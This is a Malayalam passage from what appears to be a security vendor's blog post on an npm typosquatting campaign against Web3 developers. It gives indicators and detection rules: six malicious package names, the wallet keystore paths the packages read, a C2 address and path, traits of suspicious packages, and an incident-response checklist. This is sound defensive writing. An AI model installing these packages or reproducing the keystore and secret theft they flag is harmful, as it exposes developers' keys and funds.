പൂർണ്ണമായ പെരുമാറ്റ വിശകലനം ആവശ്യമില്ലാതെ തന്നെ നിരവധി നിയമങ്ങൾ ഈ കാമ്പെയ്‌നിനെ പിന്തുടരുന്നു.

ആദ്യം, ആറ് ക്ഷുദ്ര പാക്കേജ് നാമങ്ങൾക്കായി ലോക്ക് ഫയലുകൾ സ്കാൻ ചെയ്യുക:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

ഏതെങ്കിലും പൊരുത്തം package-lock.json, yarn.lock, pnpm-lock.yaml, അഥവാ node_modules ചരിത്രത്തെ ഗൗരവമുള്ള ഒരു സംഭവമായി കണക്കാക്കണം.

രണ്ടാമതായി, വാലറ്റ് കീസ്റ്റോർ പാത്തുകൾ വായിക്കുന്ന Node.js പ്രക്രിയകൾക്കായി നിരീക്ഷിക്കുക:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

ഒരു സഹായി ആശ്രിതത്വമായി ഇറക്കുമതി ചെയ്ത ഒരു പാക്കേജിന് ഇത് വളരെ അപൂർവമായി മാത്രമേ നിയമാനുസൃതമായ പെരുമാറ്റമാകൂ. ഔട്ട്ബൗണ്ട് നെറ്റ്‌വർക്ക് പ്രവർത്തനം പിന്തുടരുമ്പോൾ ഇത് പ്രത്യേകിച്ച് സംശയാസ്പദമാണ്.

മൂന്നാമതായി, HTTPS കണക്ഷനുകളിൽ തടയുക അല്ലെങ്കിൽ മുന്നറിയിപ്പ് നൽകുക:

76.13.37.80:8443

പ്രത്യേകിച്ചും അഭ്യർത്ഥന പാത ഇതായിരിക്കുമ്പോൾ:

/api/v1/telemetry

നാലാമതായി, ഈ സ്വഭാവവിശേഷങ്ങൾ സംയോജിപ്പിക്കുന്ന npm പാക്കേജുകൾക്കായി തിരയുക:

  • പുതിയതോ കുറഞ്ഞ പ്രശസ്തിയുള്ളതോ ആയ പ്രസാധകൻ
  • പരിശോധിക്കാത്ത Gmail അക്കൗണ്ട്
  • Web3-ന്റെ തൊട്ടടുത്തുള്ള പാക്കേജിന്റെ പേര്
  • അർത്ഥവത്തായ സംഭരണ ​​ചരിത്രമില്ല.
  • ചെറിയ പാക്കേജ് ലേഔട്ട്
  • index.js ഒരു ടെലിമെട്രി അല്ലെങ്കിൽ സഹായ ഫയൽ ലോഡ് ചെയ്യുന്നത്
  • റൺടൈം ഡിപൻഡൻസികളൊന്നുമില്ല
  • സെൻസിറ്റീവ് പരിസ്ഥിതി-വേരിയബിൾ ശേഖരം
  • വാലറ്റ് കീസ്റ്റോർ ആക്‌സസ്

ഈ പാറ്റേൺ ഒരൊറ്റ ഐ‌ഒ‌സിയെക്കാൾ കൂടുതൽ ഉപയോഗപ്രദമാണ്, കാരണം അടുത്ത പാക്കേജ് ഐ‌പി വിലാസം മാറ്റിയേക്കാം, പക്ഷേ അതേ ടാർഗെറ്റിംഗ് ലോജിക് നിലനിർത്തും.

കോംപ്രമൈസ് പ്രതികരണ ചെക്ക്‌ലിസ്റ്റ്

ഒരു ഡെവലപ്പർ ആറ് പാക്കേജുകളിൽ ഒന്ന് ഉപയോഗിക്കുകയും അവയുടെ പരിസ്ഥിതി ആക്ടിവേഷൻ ഗേറ്റുമായി പൊരുത്തപ്പെടുകയും ചെയ്താൽ, വർക്ക്സ്റ്റേഷൻ വിട്ടുവീഴ്ച ചെയ്തതായി കണക്കാക്കുക.

അതിൽ ഫൗണ്ടറി ഇൻസ്റ്റാൾ ചെയ്ത മെഷീനുകൾ, പരിസ്ഥിതിയിൽ ആൽക്കെമി അല്ലെങ്കിൽ ഇൻഫുറ കീകൾ, പ്രൈവറ്റ് കീകൾ, മെമ്മോണിക്സ് അല്ലെങ്കിൽ ഡിപ്ലോയർ കീകൾ എന്നിവ ഉൾപ്പെടുന്നു.

ശുപാർശ ചെയ്യുന്ന പ്രതികരണം:

  • നെറ്റ്‌വർക്കിൽ നിന്ന് ഹോസ്റ്റ് വിച്ഛേദിക്കുക.
  • സംരക്ഷിക്കുക node_modules, ലോക്ക്ഫയലുകൾ, ഷെൽ ചരിത്രം, ഫോറൻസിക്സിനുള്ള പ്രസക്തമായ ലോഗുകൾ.
  • ഓരോ SSH കീപെയറും താഴെ തിരിക്കുക ~/.ssh/.
  • ഓരോ കീസ്റ്റോറിനും താഴെയുള്ള വാലറ്റ് കീകൾ തിരിക്കുക ~/.foundry, ~/.ethereum, ഒപ്പം ~/.brownie.
  • പുതിയ വാലറ്റുകളിലേക്ക് ഫണ്ടുകൾ മാറ്റുക.
  • സംഭരിച്ചിരിക്കുന്ന എല്ലാ രഹസ്യങ്ങളും തിരിക്കുക .env* ഡെവലപ്പർ പ്രവർത്തിച്ചിരുന്ന റിപ്പോസിറ്ററികളിലെ ഫയലുകൾ.
  • AWS കീകൾ, npm ടോക്കണുകൾ, ഡിപ്ലോയ് ടോക്കണുകൾ, API കീകൾ, പ്രൈവറ്റ് കീകൾ, സീഡുകൾ, മെമ്മോണിക്സ് എന്നിവയുൾപ്പെടെ കളക്ഷൻ റീജെക്സുമായി പൊരുത്തപ്പെടുന്ന പരിസ്ഥിതി രഹസ്യങ്ങൾ തിരിക്കുക.
  • പാക്കേജ് ആദ്യമായി ഇൻസ്റ്റാൾ ചെയ്തതുമുതൽ ക്ലൗഡ്, npm, GitHub, RPC ദാതാവ്, ബ്ലോക്ക്ചെയിൻ പ്രവർത്തനം എന്നിവ ഓഡിറ്റ് ചെയ്യുക.
  • പുനരുപയോഗിക്കുന്നതിന് മുമ്പ് വർക്ക്സ്റ്റേഷൻ വീണ്ടും ഇമേജ് ചെയ്യുക.

പ്രതിരോധക്കാർ എന്തൊക്കെ കരുതണം

ഉയർന്ന മൂല്യമുള്ള ഡെവലപ്പർ ആവാസവ്യവസ്ഥയിൽ npm ടൈപ്പോസ്ക്വാട്ടിംഗ് എങ്ങനെ വികസിച്ചുവരുന്നുവെന്ന് ഈ കാമ്പെയ്‌ൻ കാണിക്കുന്നു.

നടന് സ്ഥിരോത്സാഹം ആവശ്യമില്ലായിരുന്നു. അവർക്ക് അവ്യക്തമാക്കൽ ആവശ്യമില്ലായിരുന്നു. ഇൻസ്റ്റാൾ-ടൈം എക്സിക്യൂഷൻ പോലും അവർക്ക് ആവശ്യമില്ലായിരുന്നു.

പകരം, അവർ മൂന്ന് കാര്യങ്ങളെ ആശ്രയിച്ചു:

  • വിശ്വസനീയമായ Web3 പാക്കേജ് പേരുകൾ
  • യഥാർത്ഥ ക്രിപ്‌റ്റോ-ഡെവലപ്‌മെന്റ് മെഷീനുകളിൽ മാത്രം സജീവമാക്കൽ
  • Ethereum ഡെവലപ്പർമാർക്ക് ഏറ്റവും പ്രധാനപ്പെട്ട ഫയലുകളുടെയും രഹസ്യങ്ങളുടെയും നേരിട്ടുള്ള മോഷണം

അതുകൊണ്ടുതന്നെ, വിശാലമായ പരിശോധനയിൽ കാമ്പെയ്‌ൻ എളുപ്പത്തിൽ നഷ്ടപ്പെടുത്താനും ശരിയായ അന്തരീക്ഷത്തിൽ ഇറങ്ങുമ്പോൾ അപകടകരവുമാക്കുന്നു.

Web3 ടീമുകളെ സംബന്ധിച്ചിടത്തോളം, പാഠം വ്യക്തമാണ്: ആശ്രിതത്വ നാമങ്ങളെ നിങ്ങളുടെ ഭീഷണി മാതൃകയുടെ ഭാഗമായി പരിഗണിക്കുക. നിരുപദ്രവകരമായ ഒരു സഹായിയെപ്പോലെ തോന്നിക്കുന്ന ഒരു പാക്കേജ് ഇപ്പോഴും വാലറ്റ് വിട്ടുവീഴ്ചയ്ക്കുള്ള ഏറ്റവും ചെറിയ പാതയായി മാറിയേക്കാം.

npm രജിസ്ട്രിയിൽ റിപ്പോർട്ട് ചെയ്തു. പ്രസാധക അക്കൗണ്ടും പാക്കേജുകളും നീക്കം ചെയ്യുമ്പോൾ ഞങ്ങൾ ഈ പോസ്റ്റ് അപ്ഡേറ്റ് ചെയ്യും.

സ്കാ-ടൂളുകൾ-സോഫ്റ്റ്‌വെയർ-കോമ്പോസിഷൻ-വിശകലന-ടൂളുകൾ
നിങ്ങളുടെ സോഫ്റ്റ്‌വെയർ അപകടസാധ്യതകൾക്ക് മുൻഗണന നൽകുക, പരിഹരിക്കുക, സുരക്ഷിതമാക്കുക
നിങ്ങളുടെ സൗജന്യ അക്കൗണ്ട് നേടൂ.
ക്രെഡിറ്റ് കാർഡ് ആവശ്യമില്ല.

നിങ്ങളുടെ സോഫ്റ്റ്‌വെയർ വികസനവും ഡെലിവറിയും സുരക്ഷിതമാക്കുക

സൈജെനി ഉൽപ്പന്ന സ്യൂട്ടിനൊപ്പം